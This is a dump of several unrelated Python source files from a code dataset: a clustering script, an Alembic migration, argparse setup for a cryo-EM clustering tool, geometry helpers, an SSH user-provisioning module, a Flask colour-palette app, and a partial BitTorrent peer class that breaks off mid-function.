'XBLOCK','YBLOCK','WARD','DISTRICT','NEIGHBORHOOD_CLUSTER','CENSUS_TRACT','VOTING_PRECINCT','LATITUDE','LONGITUDE','PSA_bin'])\r\n x = fixData.values #returns a numpy array\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n x_scaled = min_max_scaler.fit_transform(x)\r\n normalizedDataFrame = pd.DataFrame(x_scaled)\r\n \r\n return normalizedDataFrame\r\n\r\n\r\n#K-Means\r\ndef KmeansClustering():\r\n normalizedDataFrame = NormalizeData()\r\n #Let k = 5\r\n k = 5\r\n kmeans = KMeans(n_clusters=k)\r\n cluster_labels = kmeans.fit_predict(normalizedDataFrame)\r\n pprint(\"KMeans: K = \"+str(k))\r\n pprint(cluster_labels)\r\n\r\n \r\n #Use Calinski-Harabaz procedures to measure the cluster quality\r\n calinski_avg =calinski_harabaz_score(normalizedDataFrame, cluster_labels)\r\n print(\"For n_clusters =\", k, \"The average calinski_harabaz_score is :\", calinski_avg)\r\n print('\\n')\r\n \r\n #plot PCA \r\n normalizedDataFrame[\"labels\"] = cluster_labels\r\n X = normalizedDataFrame.values\r\n pca = decomposition.PCA(n_components=2)\r\n plot_columns = pca.fit_transform(normalizedDataFrame)\r\n plt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=cluster_labels)\r\n plt.savefig('./plot/kmeans_pca.png')\r\n plt.show()\r\n\r\n \r\n\r\n#Agglomerative Clustering\r\ndef Agglomerative():\r\n normalizedDataFrame = NormalizeData()\r\n #Let k = 5\r\n k = 5\r\n Agglomerative = AgglomerativeClustering(n_clusters=k)\r\n cluster_labels = \tAgglomerative.fit_predict(normalizedDataFrame)\r\n pprint(\"AgglomerativeClustering: K = \"+str(k))\r\n pprint(cluster_labels)\r\n \r\n #Use Calinski-Harabaz procedures to measure the cluster quality\r\n calinski_avg =calinski_harabaz_score(normalizedDataFrame, cluster_labels)\r\n\r\n print(\"For n_clusters =\", k, \"The average calinski_harabaz_score is :\", calinski_avg)\r\n print('\\n')\r\n \r\n #plot PCA \r\n normalizedDataFrame[\"labels\"] = cluster_labels\r\n X = normalizedDataFrame.values\r\n pca = decomposition.PCA(n_components=2)\r\n plot_columns = pca.fit_transform(normalizedDataFrame)\r\n plt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=cluster_labels)\r\n plt.savefig('./plot/agglomerative_pca.png')\r\n plt.show()\r\n\r\n\r\n#DBScan\r\ndef DBScan():\r\n normalizedDataFrame = NormalizeData()\r\n #normalizedDataFrame= normalizedDataFrame.sample(frac=0.2, replace=False,axis=0)\r\n #print(normalizedDataFrame)\r\n \r\n dbscan = DBSCAN(algorithm='auto', eps=0.2, leaf_size=30, metric='euclidean',\r\n min_samples=10, n_jobs=1, p=None)\r\n cluster_labels = dbscan.fit_predict(normalizedDataFrame)\r\n pprint(\"DBSCAN:\")\r\n pprint(cluster_labels)\r\n \r\n #Use Calinski-Harabaz procedures to measure the cluster quality\r\n calinski_avg =calinski_harabaz_score(normalizedDataFrame, cluster_labels)\r\n print(\"The average calinski_harabaz_score is :\", calinski_avg)\r\n print('\\n')\r\n \r\n #plot PCA \r\n normalizedDataFrame[\"labels\"] = cluster_labels\r\n X = normalizedDataFrame.values\r\n pca = decomposition.PCA(n_components=2)\r\n plot_columns = pca.fit_transform(normalizedDataFrame)\r\n plt.scatter(x=plot_columns[:,0], y=plot_columns[:,1], c=cluster_labels)\r\n plt.savefig('./plot/dbscan_pca.png')\r\n plt.show()\r\n\r\n\r\n\r\n\r\n \r\n \r\nif __name__==\"__main__\":\r\n args = getArguments()\r\n myData = pd.read_csv(args.f, sep=',', encoding='latin1')\r\n myData = myData.drop(['REPORT_DAT','BLOCK','BLOCK_GROUP','START_DATE','END_DATE','ANC','PSA'],axis = 1)\r\n KmeansClustering()\r\n Agglomerative()\r\n 
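# KmeansClustering/Agglomerative above and DBScan below each re-normalize the\r\n    # global myData frame and report their own calinski_harabaz_score\r\n    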
DBScan()","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"314609424","text":"\"\"\"empty message\n\nRevision ID: ed02b69c4934\nRevises: b899311a97ce\nCreate Date: 2020-04-12 13:25:13.703744\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'ed02b69c4934'\ndown_revision = 'b899311a97ce'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('state_results', 'dateChecked',\n existing_type=mysql.DATETIME(),\n type_=sa.String(length=50),\n existing_nullable=True)\n op.alter_column('state_results', 'dateModified',\n existing_type=mysql.DATETIME(),\n type_=sa.String(length=50),\n existing_nullable=True)\n op.alter_column('users', 'birth',\n existing_type=sa.DATE(),\n type_=sa.DateTime(),\n existing_nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('users', 'birth',\n existing_type=sa.DateTime(),\n type_=sa.DATE(),\n existing_nullable=True)\n op.alter_column('state_results', 'dateModified',\n existing_type=sa.String(length=50),\n type_=mysql.DATETIME(),\n existing_nullable=True)\n op.alter_column('state_results', 'dateChecked',\n existing_type=sa.String(length=50),\n type_=mysql.DATETIME(),\n existing_nullable=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ed02b69c4934_.py","file_name":"ed02b69c4934_.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561812738","text":"import argparse\nimport sys\nimport os\n\n\ndef add_general_arguments(parser):\n group = parser.add_argument_group('General arguments')\n group.add_argument(\n '--cryodrgn', action='store_true', help='Use latent representations learned by cryoDRGN.'\n )\n group.add_argument(\n '--cryosparc', action='store_true', help='Use latent representations calculated by cryoSPARC 3D variability analysis.'\n )\n group.add_argument(\n '--z-file', type=str, help='Required for --cryodrgn. The pickled file containing the learned latent representation data (z.pkl).'\n )\n group.add_argument(\n '--metadata', type=str, help='Required for --cryodrgn. If a RELION refinement was the input for cryoDRGN, specify the star file here. Else if a cryoSPARC refinement was the input for cryoDRGN, specify the .csg result group file here (e.g. __particles.csg)'\n )\n group.add_argument(\n '--threedvar-csg', help='Required for --cryosparc. The 3D variability job .csg result group file. (e.g. __particles.csg)'\n )\n group.add_argument(\n '--threedvar-num-components', default=-1, type=int, help='Option for --cryosparc. How many variability components to use. For example, \"--3dvar-num-components 3\" uses the component 0, 1 and 2 for cluster analysis. By default use all the components.'\n )\n group.add_argument(\n '--random-state', type=int, help='Random state (random seed value).'\n )\n group.add_argument(\n '--output-dir', type=str, help='Output directory. 
By default the current directory.'\n )\n group.add_argument(\n '--output-file-rootname', default='cryopicls', type=str, help='Output file root name.'\n )\n return parser\n\n\ndef add_autogmm_parser(subparsers):\n parser_autogmm = add_general_arguments(\n subparsers.add_parser('auto-gmm', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='Gaussian mixture model with automatic cluster number selection based on information criterion values. Build upon the scikit-learn implementation of GMM (https://scikit-learn.org/stable/modules/generated/sklearn.mixture.GaussianMixture.html)')\n )\n group_autogmm = parser_autogmm.add_argument_group('Auto-GMM parameters')\n group_autogmm.add_argument(\n '--k-min', type=int, default=1, help='Minimum number of clusters.'\n )\n group_autogmm.add_argument(\n '--k-max', type=int, default=20, help='Maximum number of clusters.'\n )\n group_autogmm.add_argument(\n '--criterion', type=str, default='bic', choices=['bic', 'aic'], help='Information criterion for model selection. bic: Bayesian information criterion. aic: Akaike information criterion.'\n )\n group_autogmm.add_argument(\n '--n-init', type=int, default=10, help='The number of initializations to perform for each k. The best result are kept for each k. '\n )\n group_autogmm.add_argument(\n '--covariance-type', type=str, default='full', choices=['full', 'tied', 'diag', 'spherical'], help='Type of covariance parameters to use. \"full\": each component has its own general covariance matrix. \"tied\": all components share the same general covariance matrix. \"diag\": each component has its own diagonal covariance matrix. \"spherical\": each component has its own single variance.'\n )\n group_autogmm.add_argument(\n '--tol', type=float, default=1e-3, help='The convergence threshold. EM iterations will stop when the lower bound average gain is below this threshold.'\n )\n group_autogmm.add_argument(\n '--reg-covar', type=float, default=1e-6, help='Non-negative regularization added to the diagonal of covariance. Allows to assure that the covariance matrices are all positive.'\n )\n group_autogmm.add_argument(\n '--max-iter', type=int, default=100, help='The number of EM iterations to perform.'\n )\n group_autogmm.add_argument(\n '--init-params', type=str, default='kmeans', choices=['kmeans', 'random'], help='The method used to initialize the weights, the means and the precisions(variances) of the components.'\n )\n\n\ndef add_xmeans_parser(subparsers):\n parser_xm = add_general_arguments(\n subparsers.add_parser('x-means', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='X-Means clustering. Using PyClustering implementation (class pyclustering.cluster.xmeans.xmeans)')\n )\n group_xm = parser_xm.add_argument_group('X-Means parameters')\n group_xm.add_argument(\n '--k-min', type=int, default=1, help='Minimum number of clusters.'\n )\n group_xm.add_argument(\n '--k-max', type=int, default=20, help='Maximum number of clusters.'\n )\n group_xm.add_argument(\n '--criterion', type=str, default='bic', choices=['bic', 'mndl'], help='Splitting criterion. bic: Bayesian information criterion. mndl: minimum noiseless description length.'\n )\n group_xm.add_argument(\n '--no-ccore', action='store_true', help='Use Python implementation of PyClustering library instead of C++(ccore)'\n )\n group_xm.add_argument(\n '--tolerance', type=float, default=0.025, help='Stop condition for each iteration. 
If maximum value of change of clusters is less than this value, algorithm will stop processing.'\n )\n group_xm.add_argument(\n '--repeat', type=int, default=10, help='How many times K-Means should be run to improve parameters. With larger repeat values suggesting higher probability of finding global optimum.'\n )\n group_xm.add_argument(\n '--alpha', type=float, default=0.9, help='Parameter distributed [0.0, 1.0] for alpha probabilistic bound. The parameter is used only in case of MNDL splitting criterion, in all other cases this value is ignored.'\n )\n group_xm.add_argument(\n '--beta', type=float, default=0.9, help='Parameter distributed [0.0, 1.0] for beta probabilistic bound. The parameter is used only in case of MNDL splitting criterion, in all other cases this value is ignored.'\n )\n\n\ndef add_kmeans_parser(subparsers):\n parser_km = add_general_arguments(\n subparsers.add_parser('k-means', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='K-Means clustering. Using scikit-learn implementation (class sklearn.cluster.KMeans)')\n )\n group_km = parser_km.add_argument_group('K-Means parameters')\n group_km.add_argument(\n '--n-clusters', type=int, default=8, help='The number of clusters to form as well as the number of centroids to generate.'\n )\n group_km.add_argument(\n '--init', type=str, default='k-means++', choices=['k-means++', 'random'], help='Method for initialization.'\n )\n group_km.add_argument(\n '--n-init', type=int, default=10, help='Number of time the k-means algorithm will be run with different centroid seeds. The final results will be the best output of n_init consecutive runs in terms of inertia.'\n )\n group_km.add_argument(\n '--max-iter', type=int, default=300, help='Maximum number of iterations of the k-means algorithm for a single run.'\n )\n group_km.add_argument(\n '--tol', type=float, default=1e-4, help='Relative tolerance with regards to Frobenius norm of the difference in the cluster centers of two consecutive iterations to declare convergence.'\n )\n\n\ndef add_gmeans_parser(subparsers):\n parser_gm = add_general_arguments(\n subparsers.add_parser('g-means', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='G-Means clustering. Using PyClustering implementation (class pyclustering.cluster.gmeans.gmeans)')\n )\n group_gm = parser_gm.add_argument_group('G-Means parameters')\n group_gm.add_argument(\n '--k-min', type=int, default=1, help='Minimum number of clusters.'\n )\n group_gm.add_argument(\n '--k-max', type=int, default=20, help='Maximum number of clusters.'\n )\n group_gm.add_argument(\n '--no-ccore', action='store_true', help='Use Python implementation of PyClustering library instead of C++(ccore)'\n )\n group_gm.add_argument(\n '--tolerance', type=float, default=1e-3, help='Stop condition for each K-Means iteration: if maximum value of change of centers of clusters is less than tolerance than algorithm will stop processing.'\n )\n group_gm.add_argument(\n '--repeat', type=int, default=3, help='Stop condition for each iteration. If maximum value of change of clusters is less than this value, algorithm will stop processing.'\n )\n\n\ndef add_manual_select_parser(subparsers):\n parser_manual = add_general_arguments(\n subparsers.add_parser('manual', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='Manually select data by thresholding. 
Selected data will be labeled as class 001, and the rest as class 000.')\n )\n group_manual = parser_manual.add_argument_group('Manual select parameters')\n group_manual.add_argument(\n '--thresh', nargs=3, action='append', help='Specify threshold by 3 values. Format: --thresh . This option can be specified multiple times. All the thresholds will be combined with AND.'\n )\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__\n )\n subparsers = parser.add_subparsers(title='Clustering algorithms', dest='algorithm')\n\n add_autogmm_parser(subparsers)\n add_xmeans_parser(subparsers)\n add_kmeans_parser(subparsers)\n add_gmeans_parser(subparsers)\n add_manual_select_parser(subparsers)\n\n args = parser.parse_args()\n print('##### Command #####\\n\\t' + ' '.join(sys.argv))\n args_print_str = '##### Input parameters #####\\n'\n for opt, val in vars(args).items():\n args_print_str += '\\t{} : {}\\n'.format(opt, val)\n print(args_print_str)\n\n assert args.cryodrgn or args.cryosparc, 'Must specify either --cryodrgn or --cryosparc.'\n assert not (args.cryodrgn and args.cryosparc), '--cryodrgn and --cryosparc cannot be specified at the same time.'\n\n if args.cryodrgn:\n assert args.z_file is not None, 'Must specify --z-file'\n assert os.path.exists(args.z_file), f'--z-file {args.z_file} not found.'\n assert args.metadata is not None, 'Must specify --metadata'\n assert os.path.exists(args.metadata), f'--metadata {args.metadata} not found.'\n\n elif args.cryosparc:\n assert args.threedvar_csg is not None, 'Must specify --threedvar_csg'\n assert os.path.exists(args.threedvar_csg), f'--threedvar-csg {args.threedvar_csg} not found.'\n\n if args.output_dir is None:\n # Defaults to the current directory\n args.output_dir = os.getcwd()\n\n return args\n","sub_path":"cryopicls/args/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":10652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548990535","text":"import math\n\n\ndef point_distance(point1, point2):\n \"\"\"\n Returns the distance between two points given as tuples\n \"\"\"\n distance = math.sqrt(((point1[0] - point2[0])**2) +\n ((point1[1] - point2[1])**2))\n return distance\n\n\ndef multidimensional_distance(point1, point2):\n \"\"\"\n Return the euclidean distance between two points in multidimensional space \n given as tuples.\n \"\"\"\n # Checks if points are of the same dimension\n if len(point1) != len(point2):\n print('Points of unequal dimensions')\n return None\n\n dist_sq = sum( [(point1[i] - point2[i])**2 for i in range(len(point1))] )\n return math.sqrt(dist_sq)\n\n\ndef find_delta(a, b, c):\n \"\"\"\n Function that returns the delta of a quadratic equation.\n \"\"\"\n\n if a == 0:\n raise ValueError(\"a is 0! [y = ax^2 + bx + c , a != 0]\")\n\n delta = b**2 - 4*a*c\n return delta\n\n\ndef find_vertex(a, b, c):\n \"\"\"\n Function that returns the vertex of a parabola, given three coefficients.\n\n :returns: tuple\n \"\"\"\n\n delta = find_delta(a, b, c)\n\n vertex = ( -b/(2*a), -(delta/(4*a)) )\n return vertex\n\n\ndef find_focus(a, b, c):\n \"\"\"\n Function that returns the focus of a parabola, given three coefficients.\n\n :returns: tuple\n \"\"\"\n\n delta = find_delta(a, b, c)\n\n focus = ( -b/(2*a), (1-delta)/(4*a) )\n return focus\n\n\ndef binomial_coefficient(n, k):\n \"\"\"\n Finds the binomial coefficient, given n and k.\n Equals:\n n! 
/ (k!*(n-k)!)\n    \"\"\"\n    bin_coeff = (math.factorial(n) // (math.factorial(k) * math.factorial(n - k)))\n    return bin_coeff\n\n\ndef quadratic_roots(a, b, c):\n    \"\"\"\n    Returns a tuple containing the roots of the quadratic equation ax^2+bx+c\n    If the roots are imaginary then an error message is displayed and None is returned\n    \"\"\"\n    D = (b**2) - (4 * a * c)\n    if D<0:\n        print(\"Imaginary roots\")\n        return None\n    else:\n        num1=-b+(D**(1/2))\n        num2=-b-(D**(1/2))\n        denum=2*a\n        return (num1/denum, num2/denum)\n\n\nif __name__ == '__main__':\n    import doctest\n    doctest.testmod()\n","sub_path":"src/coordinate_geometry.py","file_name":"coordinate_geometry.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"105477668","text":"# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import,unicode_literals)\n \n# Import community modules.\nimport os\nimport sys\nimport json\nimport requests\nfrom subprocess32 import call\nfrom termcolor import cprint\n\n# Import custom modules.\nfrom slen.config import config\n\n\n# Identity controller.\nclass identity(object):\n\n    # Initializer.\n    def __init__(self,**kwargs):\n        self.system = {}\n        self.account = {}\n        self.user = {}\n        self.system['base_home_dir'] = config['system']['base_home_dir']\n        self.account['full_domain'] = config['account']['full_domain']\n        self.account['scheme'] = config['account']['scheme']\n        self.user['api_key_identifier'] = config['user']['api_key_identifier']\n        self.user['api_key_token'] = config['user']['api_key_token']\n\n    # Setup base home directory.\n    def setup_base_home_dir(self):\n        try:\n            call(['mkdir','-p',self.system['base_home_dir']])\n        except Exception as Error:\n            cprint('Error setting-up system base home directory.','red')\n            sys.exit(1)\n\n    # Get Identity.\n    def get(self,params):\n        params = json.loads(params)\n        request = requests.get(\n            self.account['scheme']+'://'+self.account['full_domain']+'/API/Stack/'+str(params['stack_id'])+'/Identity/'+str(params['identity_id']),\n            headers={'Authorization':'SLEN '+self.user['api_key_identifier']+':'+self.user['api_key_token']}\n        )\n        response = request.json()\n        return {'request':request,'response':response}\n\n    # Sync Identity.\n    def sync(self,params):\n        data = self.get(params)\n        if data['request'].status_code==200 and data['response']['status']=='success' and data['response'].has_key('result'):\n            identity_data = data['response']['result']['identity']\n            if self.exists(identity_data) is True:\n                cprint('Identity already exists.','yellow')\n                identity_data['home_dir'] = self.system['base_home_dir']+'/'+identity_data['name']\n                self.update_keys(identity_data)\n                sys.exit(1)\n            self.setup_base_home_dir()\n            identity_data['home_dir'] = self.system['base_home_dir']+'/'+identity_data['name']\n            self.create(identity_data)\n            self.configure(identity_data)\n            self.update_keys(identity_data)\n        else:\n            cprint('Error syncing Identity.','red')\n            sys.exit(1)\n\n    # Rotate Identity keys.\n    def rotate_keys(self,params):\n        params = json.loads(params)\n        request = requests.get(\n            self.account['scheme']+'://'+self.account['full_domain']+'/API/Stack/'+str(params['stack_id'])+'/Identity/'+str(params['identity_id'])+'/RotateKeys',\n            headers={'Authorization':'SLEN '+self.user['api_key_identifier']+':'+self.user['api_key_token']}\n        )\n        response = request.json()\n        if request.status_code==200 or response['status']=='success':\n            cprint('Identity keys rotated.','green')\n        else:\n            cprint('Error rotating Identity keys.','red')\n            
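# reached only when the HTTP status is not 200 and the payload does not\n            # report success; exit non-zero so callers can detect the failure\n            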
sys.exit(1)\n\n # Delete Identity.\n def delete(self,params):\n data = self.get(params)\n if data['request'].status_code==200 and data['response']['status']=='success' and data['response'].has_key('result'):\n identity_data = data['response']['result']['identity']\n if self.exists(identity_data) is False:\n cprint('Identity does not exist.','yellow')\n sys.exit(1)\n self.remove(identity_data)\n else:\n cprint('Error deleting Identity.','red')\n sys.exit(1)\n\n # Check Identity exists.\n def exists(self,data):\n id = call(['id',data['name']])\n if id==0:\n return True\n else:\n return False\n\n # Create Identity.\n def create(self,data):\n try:\n add_user = call(['useradd','-m','-s','/bin/bash','-d',data['home_dir'],data['name']])\n if add_user!=0:\n raise\n call(['chmod','-R','o-rwx',data['home_dir']])\n cprint('Identity created.','green')\n except Exception as Error:\n self.remove(data)\n cprint('Error creating Identity.','red')\n sys.exit(1)\n\n # Configure Identity.\n def configure(self,data):\n try:\n def keys(data):\n call(['touch',data['home_dir']+'/.ssh/authorized_keys'])\n call(['chmod','600',data['home_dir']+'/.ssh/authorized_keys'])\n call(['touch',data['home_dir']+'/.ssh/id_rsa'])\n call(['chmod','400',data['home_dir']+'/.ssh/id_rsa'])\n\n def permission(data):\n call(['chmod','-R','700',data['home_dir']+'/.ssh'])\n\n def ownership(data):\n call(['chown','-R',data['name']+':'+data['name'],data['home_dir']+'/.ssh'])\n\n def settings(data):\n call(['touch',data['home_dir']+'/.ssh/config'])\n config_path = data['home_dir']+'/.ssh/config'\n if os.path.isfile(config_path):\n config_file = open(config_path,'wt')\n config_file.write('Host *\\n\\tStrictHostKeyChecking no\\n')\n config_file.close()\n\n ssh_dir = call(['mkdir',data['home_dir']+'/.ssh'])\n if ssh_dir!=0:\n raise\n permission(data)\n keys(data)\n settings(data)\n ownership(data)\n except Exception as Error:\n self.remove(data)\n cprint('Error configuring Identity.','red')\n sys.exit(1)\n\n # Update Identity keys.\n def update_keys(self,data):\n try:\n authorized_keys = data['home_dir']+'/.ssh/authorized_keys'\n if os.path.isfile(authorized_keys):\n public_key = open(authorized_keys,'wt')\n public_key.write(data['public_key'])\n public_key.close()\n id_rsa = data['home_dir']+'/.ssh/id_rsa'\n if os.path.isfile(id_rsa):\n private_key = open(id_rsa,'wt')\n private_key.write(data['private_key'])\n private_key.close()\n cprint('Identity keys updated.','green')\n except Exception as Error:\n self.remove(data)\n cprint('Error updating Identity keys.','red')\n sys.exit(1)\n\n # Remove Identity.\n def remove(self,data):\n try:\n delete_user = call(['userdel','-r',data['name']])\n if delete_user!=0:\n raise\n except Exception as Error:\n cprint('Error deleting Identity.','red')\n sys.exit(1)\n else:\n cprint('Identity deleted.','green')\n","sub_path":"slen/core/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298497485","text":"from flask import render_template, redirect, url_for, request\n \nfrom application import app, db, bcrypt\n\nfrom flask import render_template, redirect, url_for, request, flash\nfrom application.models import Colours, Palettes, Users\nfrom application.forms import UpdatePaletteForm, RegistrationForm, LoginForm, UpdateAccountForm, ColourSearchForm\nfrom flask_login import login_user, current_user, logout_user, login_required\n\n@app.route('/home')\n@app.route(\"/\")\ndef 
home():\n    return render_template('home.html', title='Home')\n\n@app.route('/library', methods=['GET','POST'])\n@login_required\n\ndef library():\n    paletteData = Palettes.query.all()\n\n    return render_template('library.html', title='Library', Palettes=paletteData)\n\n@app.route('/library/delete/<int:id>', methods=['GET','POST'])\n@login_required\n\ndef delete_palette(id):\n\n    palette_delete = Palettes.query.filter_by(id=id).first()\n\n    db.session.delete(palette_delete)\n    db.session.commit()\n\n    return redirect(url_for('library'))\n\n\n\n@app.route('/update', methods=['GET','POST'])\n@login_required\n\ndef update():\n\n    form = ColourSearchForm()\n    colour_search = ColourSearchForm(request.form)\n\n    if request.method == 'POST':\n        palettes = Palettes(colour1=form.select1.data, colour2=form.select2.data, colour3=form.select3.data, user_id=current_user.get_id())\n        #print(form.select1.data)\n        #print(form.select2.data)\n        #print(form.select3.data)\n\n\n        db.session.add(palettes)\n        db.session.commit()\n\n        return redirect(url_for('library'))\n\n    else:\n        print(form.errors)\n        return render_template('create.html', title='Palette', form=form)\n\n# palette= Palettes.query.filter_by(id=form.paletteid.data)()\n\n    # form = ColourSearchForm()\n    # colour_search = ColourSearchForm(request.form)\n\n    # if request.method == 'POST':\n    #     search = colour_search.data['select']\n\n    #     db.session.add(Palettes)\n    #     db.session.commit()\n\n    #     return render_template('library.html',form=colour_search)\n\n    # else:\n    #     print(form.errors)\n    #     return render_template('update.html', title='Palette', form=form)\n\n\n\n@app.route('/login',methods=['GET','POST'])\ndef login():\n\n    form = LoginForm()\n\n    if current_user.is_authenticated:\n        return redirect(url_for('home'))\n\n    if form.validate_on_submit():\n\n        user=Users.query.filter_by(email=form.email.data).first()\n\n        if user and bcrypt.check_password_hash(user.password, form.password.data):\n\n            login_user(user, remember=form.remember.data)\n            next_page = request.args.get('next')\n\n            if next_page:\n                return redirect(next_page)\n            else:\n                return redirect(url_for('home'))\n\n    return render_template('login.html', title = 'Login',form=form)\n\n\n\n\n@app.route('/register', methods=['GET','POST'])\ndef register():\n\n    if current_user.is_authenticated:\n        return redirect(url_for('home'))\n\n    form = RegistrationForm()\n\n    if form.validate_on_submit():\n\n        hashed_pw = bcrypt.generate_password_hash(form.password.data)\n\n        user = Users(\n            first_name=form.first_name.data,\n            last_name=form.last_name.data,\n            email=form.email.data,\n            password=hashed_pw)\n\n        db.session.add(user)\n        db.session.commit()\n\n        return redirect(url_for('login'))\n    return render_template('register.html', title = 'Register', form=form)\n\n\n@app.route('/create', methods=['GET','POST'])\n@login_required\n\ndef create():\n    form = ColourSearchForm()\n    colour_search = ColourSearchForm(request.form)\n\n    if request.method == 'POST':\n        palettes = Palettes(colour1=form.select1.data, colour2=form.select2.data, colour3=form.select3.data, user_id=current_user.get_id())\n        #print(form.select1.data)\n        #print(form.select2.data)\n        #print(form.select3.data)\n\n\n        db.session.add(palettes)\n        db.session.commit()\n\n        return redirect(url_for('library'))\n\n    else:\n        print(form.errors)\n        return render_template('create.html', title='Palette', form=form)\n\n\n#def create():\n\n    #form = PaletteForm()\n    # if form.validate_on_submit():\n\n        #colour1_id = Colours.query.filter_by(colour_name=form.colour1.data).first().id\n        #colour2_id = 
Colours.query.filter_by(colour_name=form.colour2.data).first().id\n # colour3_id = Colours.query.filter_by(colour_name=form.colour3.data).first().id\n\n # palettedata = Palettes(\n #palette_name = form.palette_name.data,\n #colour1 = colour1.data,\n #colour2 = colour2.data,\n #colour3 = colour3.data\n #)\n\n #colour_id = Colours.query.filter_by(colour_name=form.colour_name.data).all()\n\n #db.session.add(palettedata)\n #db.session.commit()\n\n #return redirect(url_for('library'))\n\n #else:\n # print(form.errors)\n # return render_template('create.html', title='Palette', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n\n logout_user()\n\n return redirect(url_for('login'))\n\n@app.route('/account', methods=['GET','POST'])\n@login_required\n\ndef account():\n\n form = UpdateAccountForm()\n\n if form.validate_on_submit():\n\n current_user.first_name = form.first_name.data\n current_user.last_name = form.last_name.data\n current_user.email = form.email.data\n db.session.commit()\n return redirect(url_for('account'))\n\n elif request.method == 'GET':\n form.first_name.data = current_user.first_name\n form.last_name.data = current_user.last_name\n form.email.data = current_user.email\n\n return render_template('account.html', title='Account', form=form)\n\n","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597594933","text":"'''\r\npeer class\r\n'''\r\n\r\nimport socket\r\nimport struct\r\nimport hashlib\r\nfrom .log import logging\r\n\r\n__all__ = [\"Peer\"]\r\n\r\nclass Peer(object):\r\n '''\r\n peer object\r\n '''\r\n def __init__(self, ip_port, peer_id, info_hash, pieces_length, pieces_hash, total_length):\r\n self._ip_port = ip_port\r\n self._peer_id = peer_id\r\n self._info_hash = info_hash\r\n self._out_buffer = b\"\"\r\n self._in_buffer = b\"\"\r\n self._pieces_length = pieces_length\r\n self._pieces_hash = pieces_hash\r\n self._total_length = total_length\r\n self._request_index = 0\r\n self._request_begin = 0\r\n self.mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self._recv_pieces = [0 for _ in range(len(self._pieces_hash))]\r\n self.mysock.setblocking(0)\r\n self.mysock.connect(self._ip_port)\r\n\r\n def create_handshake(self):\r\n '''\r\n write handshake pack into out_buffer\r\n '''\r\n self._out_buffer += self._create_handshake_pack()\r\n\r\n def _create_handshake_pack(self):\r\n buf = chr(19).encode(\"utf-8\")\r\n buf += \"BitTorrent protocol\".encode(\"utf-8\")\r\n buf += 8*chr(0).encode(\"utf-8\")\r\n buf += self._info_hash\r\n buf += self._peer_id\r\n return buf\r\n\r\n def _check_handshake_response(self, response):\r\n if len(response) < 68:\r\n return False\r\n _offset = 0\r\n pstrlen = struct.unpack_from(\"!B\", response, _offset)[0]\r\n _offset += 1\r\n pstr = struct.unpack_from(\"!19s\", response, _offset)[0]\r\n _offset += 19\r\n _offset += 8\r\n info_hash_response = struct.unpack_from(\"!20s\", response, _offset)[0]\r\n if pstrlen == 19 and pstr == b\"BitTorrent protocol\" and info_hash_response == self._info_hash:\r\n return True\r\n else:\r\n return False\r\n\r\n def _send_interested_info(self):\r\n self._out_buffer += b\"\\x00\\x00\\x00\\x01\\x02\"\r\n\r\n def _send_pieces_request(self):\r\n print(self._pieces_length , self._total_length)\r\n if (self._request_index + 1) * self._pieces_length < self._total_length:\r\n print(self._pieces_length)\r\n self._out_buffer += struct.pack(\">IBIII\", 
13, 6, self._request_index, self._request_begin, self._pieces_length)\r\n            self._request_index += 1\r\n            self._request_begin += self._pieces_length\r\n        else:\r\n            # last request: ask only for the bytes that remain; _request_begin is\r\n            # tracked here as a running byte offset, not a piece index\r\n            self._out_buffer += struct.pack(\">IBIII\", 13, 6, self._request_index, self._request_begin, self._total_length - self._request_begin)\r\n\r\n    def _handle_buffer(self):\r\n        '''\r\n        handle buffer in in_buffer\r\n        '''\r\n        if self._check_handshake_response(self._in_buffer[:68]):\r\n            self._in_buffer = self._in_buffer[68:]\r\n            logging.info(\"check the handshake with %s:%d : no error\" % (self._ip_port[0], self._ip_port[1]))\r\n        else:\r\n            length = struct.unpack(\">I\", self._in_buffer[:4])[0]\r\n            if len(self._in_buffer) < int(length) + 4:\r\n                return False\r\n            if length == 0:\r\n                self._in_buffer = b\"\"\r\n                return False\r\n            type_id = self._in_buffer[4]\r\n            if type_id == 5:\r\n                logging.info(\"get bitfield!\")\r\n                bitfield_buffer = self._in_buffer[5:length + 4]\r\n                bin_bitfield_buffer = bin(int(bitfield_buffer.hex(), 16))\r\n                if len(self._pieces_hash) == len(bin_bitfield_buffer[2:]):\r\n                    _offset = 0\r\n                    for field in bin_bitfield_buffer[2:]:\r\n                        self._recv_pieces[_offset] = field\r\n                        _offset += 1\r\n                else:\r\n                    